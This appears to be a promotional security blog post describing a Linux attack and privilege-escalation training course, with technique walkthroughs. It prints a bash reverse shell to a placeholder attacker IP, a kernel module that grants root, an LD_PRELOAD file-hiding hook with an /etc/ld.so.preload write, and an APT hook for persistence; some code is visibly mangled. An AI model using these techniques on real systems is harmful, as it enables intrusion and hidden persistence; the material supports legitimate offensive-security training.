Listen to this Post

Introduction:
The offensive security landscape is shifting. Automated vulnerability scanners and public exploit scripts are no longer enough to guarantee access during a red team engagement. Modern offensive security engineers must understand the primitives behind the tools—the fundamental operating system mechanisms that make privilege escalation and persistence possible. White Knight Labs’ newly released “Linux Attack and Privesc for Offensive Security Engineers” course takes a hands-on approach, walking students through compromising a single intentionally weakened Ubuntu 26.04 LTS host. From building reverse shells by hand to writing eBPF rootkits, this training emphasizes the “how” and “why” behind every attack, ensuring that when automation fails, the operator can still find the path forward.
Learning Objectives:
- Master the full attack lifecycle on Linux systems: reconnaissance, exploitation, foothold, enumeration, privilege escalation, and persistence.
- Understand and chain public N-day vulnerabilities (e.g., Jenkins RCE) to gain initial access.
- Leverage Linux capabilities (e.g.,
CAP_SYS_MODULE) to load malicious kernel modules and escalate privileges. - Implement advanced persistence mechanisms including PAM backdoors, LD_PRELOAD hooks, and APT package manager triggers.
- Develop and deploy eBPF-based rootkits for file-hiding and advanced evasion.
You Should Know:
- Reconnaissance and Initial Foothold: The Art of the Reverse Shell
Before any privilege escalation can occur, an attacker must establish a foothold. The course begins with reconnaissance against the Ubuntu 26.04 target, identifying open ports, running services, and potential vulnerabilities. A common initial vector is exploiting a publicly disclosed vulnerability in a service like Jenkins. Recent vulnerabilities, such as CVE-2025-53652 (a command injection flaw in the Jenkins Git Parameter plugin), have exposed thousands of Jenkins servers to unauthenticated remote code execution.
Once a vulnerability is identified, the next step is to build a reverse shell by hand. This means crafting a payload that connects back to an attacker-controlled machine, bypassing common network restrictions. A basic reverse shell using `/bin/bash` and a TCP connection might look like this:
On the attacker machine (listener) nc -lvnp 4444 On the target machine (payload) bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1
However, modern environments often have egress filtering or intrusion detection. More sophisticated techniques involve using python, perl, or even `openssl` for encrypted reverse shells. The key is understanding how to construct these primitives manually, ensuring that you can adapt when your go-to tool (like msfvenom) is blocked or unavailable.
- Privilege Escalation Through Linux Capabilities: The `CAP_SYS_MODULE` Vector
After gaining a low-privilege shell, the next objective is to escalate to root. One powerful vector involves the `CAP_SYS_MODULE` capability. This capability allows a process to load and unload arbitrary kernel modules. In containerized environments, if a container is run with the `–privileged` flag or if `CAP_SYS_MODULE` is explicitly enabled, an attacker can load a kernel module from within the container, leading to a trivial and powerful container escape.
On a standard Linux system, if a process has CAP_SYS_MODULE, an attacker can compile and insert a kernel module that grants root privileges. The process typically involves:
- Writing a Kernel Module: Create a simple kernel module that, when loaded, executes a command or elevates the privileges of the current process.
- Compiling the Module: Compile the module on the target system using the installed kernel headers.
- Loading the Module: Use `insmod` or `modprobe` to load the malicious module.
Example of a simple kernel module that spawns a root shell:
include <linux/module.h>
include <linux/kernel.h>
include <linux/cred.h>
static int __init load_module(void) {
commit_creds(prepare_kernel_cred(0));
return 0;
}
static void __exit unload_module(void) {}
module_init(load_module);
module_exit(unload_module);
MODULE_LICENSE("GPL");
Compile with:
make -C /lib/modules/$(uname -r)/build M=$(pwd) modules
Load with:
insmod module.ko
After loading, the current process will have root privileges. The course teaches not just the exploitation but also the remediation: removing the `CAP_SYS_MODULE` capability from containers and restricting module loading with kernel.modules_disabled=1.
3. Advanced Persistence: PAM Backdoors and LD_PRELOAD
Maintaining access is critical. The course covers two stealthy persistence mechanisms: PAM backdoors and LD_PRELOAD rootkits.
PAM Backdoors: Pluggable Authentication Modules (PAM) handle authentication on Linux systems. A malicious PAM module can be planted to bypass authentication and log credentials. The “Plague” backdoor, for instance, masquerades as a legitimate PAM module, targeting the `pam_sm_authenticate()` function to grant persistent SSH access. An attacker with root access can replace or add a PAM module that always returns success for a specific password.
LD_PRELOAD Rootkits: The `LD_PRELOAD` environment variable allows a user to specify a shared library to be loaded before others. By setting `LD_PRELOAD` to a malicious library, an attacker can hook and intercept function calls (e.g., read, write, open) across all processes. This can be used to hide files, processes, and network connections. The Quasar Linux RAT (QLNX), for example, carries embedded C source code for both its PAM backdoor and LD_PRELOAD rootkit.
To implement an LD_PRELOAD backdoor, an attacker would:
- Write a shared library that overrides specific functions.
- Set the `LD_PRELOAD` environment variable globally (e.g., in `/etc/environment` or
/etc/ld.so.preload). - The malicious code will be executed whenever the hooked functions are called.
Example of a simple LD_PRELOAD hook that hides a file:
define _GNU_SOURCE
include <dlfcn.h>
include <dirent.h>
include <string.h>
struct dirent readdir(DIR dirp) {
struct dirent (original_readdir)(DIR );
original_readdir = dlsym(RTLD_NEXT, "readdir");
struct dirent dir = original_readdir(dirp);
while (dir != NULL && strcmp(dir->d_name, "secret_file") == 0) {
dir = original_readdir(dirp);
}
return dir;
}
Compile with:
gcc -shared -fPIC -o hide.so hide.c -ldl
Set the preload:
echo "/path/to/hide.so" > /etc/ld.so.preload
- APT Persistence Hooks: Triggering Payloads on Package Management
Another sophisticated persistence mechanism involves abusing the APT package manager. APT allows administrators to define pre-invoke and post-invoke hooks in /etc/apt/apt.conf.d/. An attacker with root access can create a hook that executes a payload every time APT is used. This ensures that the backdoor is re-triggered during routine system updates, making it highly resilient.
The Metasploit Framework includes a module for this exact technique: exploit/linux/local/apt_package_manager_persistence. The module writes a pre-invoke hook to `/etc/apt/apt.conf.d/` that executes a payload when the package manager is invoked.
Manual implementation:
echo 'APT::Update::Pre-Invoke { "echo 'backdoor executed'"; };' > /etc/apt/apt.conf.d/99-backdoor
This command creates a hook that runs a command before every APT update. An attacker could replace the `echo` command with a reverse shell or a callback to a command-and-control server.
5. eBPF Rootkits: The Next Generation of Evasion
Extended Berkeley Packet Filter (eBPF) has emerged as a powerful tool for both system observability and malicious evasion. Unlike traditional kernel modules, eBPF programs run in a sandboxed environment within the kernel, but they can still hook syscalls and kernel functions to hide malicious activity.
Attackers are increasingly combining eBPF with traditional kernel modules. The eBPF component can hide the presence of a kernel module from tools like lsmod, while the kernel module provides deep system access. The VoidLink rootkit, for example, blends LKMs with eBPF programs to hide deep inside the operating system’s core. eBPF rootkits can conceal processes, hide files, mask network connections, and even suppress their own presence in kernel module lists.
A simple eBPF program to hide a file by hooking the `getdents` syscall (which is used to list directory contents) can be written in C and loaded using the `bpftool` or a custom loader. The course teaches students how to write and deploy such programs, emphasizing that finding the vulnerability is only half the job—being able to explain what happened and how to remediate it is what makes you valuable.
What Undercode Say:
- Key Takeaway 1: The most effective offensive security engineers are those who understand the underlying primitives—the kernel structures, the syscall interfaces, and the configuration files—not just the tools that automate them.
- Key Takeaway 2: The course’s focus on a single, intentionally weakened Ubuntu 26.04 lab provides a realistic, contained environment to practice the entire attack chain, from initial compromise to advanced persistence, while also teaching the defensive side through remediation guidance.
Analysis:
The “Linux Attack and Privesc” course is a direct response to the growing complexity of modern Linux environments and the increasing sophistication of attackers. By moving beyond tool-centric training, White Knight Labs is addressing a critical gap in the cybersecurity education market. The inclusion of eBPF rootkits and kernel module exploitation is particularly timely, given the rise of eBPF-based malware and the increasing use of containers and microservices where capabilities like `CAP_SYS_MODULE` can be a significant risk. Furthermore, the emphasis on remediation—teaching what’s vulnerable and how to fix it—aligns with the industry’s need for security professionals who can bridge the gap between offensive and defensive operations. The 40% 4th of July sale makes this advanced training more accessible, potentially lowering the barrier for entry-level penetration testers to acquire these high-level skills. As the course promises more ARM material for Windows and macOS, it positions itself at the forefront of cross-platform offensive security training.
Prediction:
- +1 The demand for professionals who can manually chain exploits and understand system internals will continue to grow, making courses like this increasingly valuable for career advancement.
- -1 As attackers adopt these advanced techniques (PAM backdoors, eBPF rootkits) more widely, defenders will face a significant challenge in detection and remediation, potentially leading to a rise in sophisticated, long-term compromises.
- +1 The open-source community and commercial vendors will likely accelerate development of eBPF-based detection and response tools, creating new opportunities for blue teams.
- -1 The ease of creating APT persistence hooks and PAM backdoors means that once an attacker gains root, achieving long-term persistence is trivial, emphasizing the critical need for robust endpoint detection and response (EDR) solutions.
▶️ Related Video (76% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: John Stigerwalt – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


